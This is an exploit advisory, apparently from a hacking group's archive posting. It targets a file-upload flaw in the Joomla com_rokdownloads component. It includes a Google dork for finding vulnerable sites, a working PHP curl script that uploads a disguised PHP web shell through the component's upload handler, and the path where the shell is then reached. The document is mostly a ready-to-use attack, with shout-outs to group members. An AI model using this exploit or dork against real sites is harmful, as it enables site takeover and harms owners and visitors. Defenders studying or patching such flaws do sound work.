################################# # ISlamic Republic Of Iran Security Team # Www.IrIsT.Ir ################################# # Exploit Title : joomla com_rokdownloads Components shell upload Vulnerability # Author : IrIsT Security & Researcher Team # Discovered By : Am!r # Home : http://IrIsT.Ir - http://IrIsT.Ir/forum # Facebook Page : http://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573 # Software Link : http://www.joomla.org # Security Risk : High # Tested on : Linux # Dork : inurl:administrator/components/com_rokdownloads ################################# Exploit : Post.php <?php $uploadfile="Amir.php.gif"; $ch = curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/images/stories/Amir.php.gif ################################# # Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0 # sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous # Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv # & All Members In IrIsT.Ir ################################# #Tnx To : PacketstormSecurity.Org - Cxsecurity.Com - 1337day.com - exploit-db.com #################################